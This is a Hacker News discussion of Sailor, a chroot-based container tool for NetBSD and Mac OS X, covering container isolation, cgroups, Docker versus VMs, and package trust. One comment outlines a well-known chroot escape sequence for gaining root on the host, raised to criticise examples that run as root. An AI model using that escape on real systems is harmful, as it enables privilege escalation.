Hacker News new | past | comments | ask | show | jobs | submit login
Sailor, a native and portable container system for NetBSD and Mac OS X (github.com/netbsdfr)
109 points by petepete on Jan 16, 2016 | hide | past | favorite | 30 comments



While neat and useful - is it fair to call this a container ? It seems to only partition/isolate the filesystem(perhaps network interface too) - while (arguably) the benefit of containers is being able to also partition and isolate CPU, memory, network, routing, etc.


Smarter people than me say that "true" containerizing on OS X is not really a thing[1].

[1] https://github.com/vito/houdini


OS X doesn't provide kernel features directly equivalent to Linux's CLONE_* and cgroups. But it does provide Seatbelt, a sandboxing policy layer, which you could use with effort to implement something similar in end result. This is what both iOS apps and desktop App Store apps use for security isolation.

Alternatively, you could ship a kernel module that added these features (although that might be ridiculously complicated).


Alex (aka vito) likes implementing things from scratch on weekends. So if you surprised him with a github issue he might just take you up on that challenge.


The cpu / memory / network "isolation" is done with cgroups and can be done without containers


cgroups are Linux-specific - they're not relevant for a OS X/NetBSD tool.


no kidding ? sarcasm

They also don't isolate anything. especially when the container system is running as root. Neither does chroot.


This brings me back to when we were creating complex scripts to generate jails on FreeBSD.

It seems to me that sailor is just a chroot, in other words it's just a jail with a bunch of stuff crammed in there to make it work. Just like 10 years ago on FreeBSD when you created a jail and had to make the system inside the jail to make it work.


It should be pointed out that Pkgin is not installed by default with NetBSD, although you can add it during the installer configuration. The reason I know that is that I manually configure my NetBSD installs, as I do not like the depend on configuration tools.


[flagged]


Please don't.

We detached this comment from https://news.ycombinator.com/item?id=10915862 and marked it off-topic.


Dont expect me to not LOL when idiots are downvoting technically true statements. ;)


So, the default example for node.js spawns the worker as root in the 'container'. Since this is a simple chroot, the worker could execute a 90's style chroot escape (open; mkdir; chroot; fchdir; chdir ../../../; chroot.) and gain root on the host.

Is this a joke?


If your goal with containerization is to run trusted applications that just need bizarre systemwide configuration (possibly mutually-conflicting configuration), and keep that configuration separate from the host, then no, it's not a joke. This is a super useful use case for containers.

There's a strong case to be made that you should not be trusting Docker containers for untrusted code; they're just also for configuration isolation, not security isolation. After all, Docker runs on top of the Linux kernel.... If you want to run untrusted code, put it in a VM (kvm, bhyve, Xen, whatever).


I've never argued against the model of containerization for configuration isolation.

I'm arguing against this piece of software and examples it ships. Giving root to a trusted web app is not something sane.


Docker has kernel support from cgroups (and other features). Vastly different from a simple chroot. Maybe not as strong as full virtualization, but if we're worried about kernel bugs that allow privilege escalation, we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs.

Comparing Docker (or any Linux container using cgroups, like LXC) to chroot is not accurate.


Sure, I agree that Docker is pretty good, and much better at security than a simple chroot. But I think you should be worried about those kernel bugs if you're on Linux, and you should therefore be using actual virtualization (hardware, paravirt, whatever). And therefore, it shouldn't matter how much better Docker is at security than a simple chroot, except as far as defense-in-depth goes: it should not be the single thing you're relying on to sandbox untrusted applications.

That is, I am not saying that Docker is bad at security; I am saying that caring about how much security it provides is using the wrong tool for the job.


> we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs

Usually "everything running on tbe system" is trusted code. The threat would be a bug in your software that allows remote code execution and could potentially be combined with a kernel bug to achieve privilege escalation.

The game changes significantly when you're giving arbitrary user-supplied code immediate access to make kernel calls. Now you're only one bug away from game over. And you're trusting the security of your whole system with a mechanism that wasn't really designed for security against untrusted code in the first place.


On that, we're agreed. The Docker ecosystem is scary for that reason. But, "trusted code" is also wishful thinking in most deployments. So many deployments are slapped together out of a bunch of random places. The way many people use Docker just takes that to a slightly more terrifying new level of risk.

e.g.: npm, go get, *brew (in particular, Homebrew, OMG; goddamned thing installs everything, from webservers to databases, to run as the same user with little warning about what kind of consequences that has), etc.

People do stupid shit all the time with their software deployments, is what I'm trying to say.

I just didn't want people to think Docker (or other Linux containers) are comparable to chroot. They really aren't the same thing.


npm, go get, home-brew..It is alright to me, in fact. I would rather take the risk and trust them, than doing so many manually things. They could introduce safety risk, same as you buy a can of food from a superstore and eat it "as the same user with little warning about what kind of consequences that has".


I've made no suggestion of doing anything manually. That would likely be even more dangerous.

There are well-known, and well-understood, automated methods of providing a (mostly) trustworthy source for software installation. RPM+yum on CentOS, deb+apt-get on Debian/Ubuntu. The packages can be signed and verified (so you know you're getting what the vendor packaged), the OS-standard sources are open source and easy for third parties to check and used on millions of machines (so you know manipulation is likely to be spotted quickly), easy to verify the versions you have with one command, easy to update to newer versions when security issues arise, easy to verify the files currently installed match (or don't) the ones that the package shipped with. And, it is relatively easy to package ones own tools and put them into a local repository, using the same methods to insure safe delivery to all of your systems.

I understand using other methods of locally providing packages. And, I understand that sometimes you have to go outside the vendor provided packages (and can't build your own, using the same best practices). But, to imagine that you can/should trust a big blob of data grabbed from the internet and splooshed onto your system (sometimes as root!) using a pipe to /bin/sh, is ridiculous. Don't do that in an automated fashion without explicitly checking out what you're being delivered. And, I would probably opt to host my own private repo of those things, so that I can re-verify any time there are changes before they get splooshed out to all of my systems.

This is basic operations stuff here, and yet folks keep reinventing the wheel, poorly, and aggressively marketing it as a superior wheel.


Well it is designed on NetBSD where this doesn't work.

eg see http://www.slideshare.net/phdays/chw00t-breaking-unices-chro... slide 27


sailor's goal is definitely not to bring security, we all perfectly know chroot is not the way of isolating a host filesystem from attackers. Instead, sailor provides a convenient way of testing environments without compromising your workstation / dev station filesystem.


Which was, as it happens, the reason chroot was invented (to test the installer of newer versions of UNIX without having a brand-new physical system). Better tooling around chroot is absolutely useful.

I guess it's a misnomer to use the word "container", since that usually means things like Linux containers with security isolation almost as good as OS virtualization.


Right, the "container" word is now vastly associated to docker, yet I picked a word I know IT people will get and which is generic enough. I'll think on an alternative buzzword ;) Thanks for your support!


The word you're looking for is "chroot".


There is a difference between not bringing in additional security and bringing anti-security. In my eyes, you are doing the latter.

Your default examples elevate privilege, not warning the user about this fact anywhere.


Duly noted, I just added a word about it on the GitHub page, and you're right, I should run the examples services with a dedicated user as I already do for the nginx process. Thanks for your feedback!


And so it is, I just commited changes so both PM2 and gunicorn are started with a specific user.


There is already a Lua web framework named Sailor: http://sailorproject.org/ -- since this is a rather closely related problem domain, it might be nice to avoid name collisions.


I fail to see how it's a closely related problem domain.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: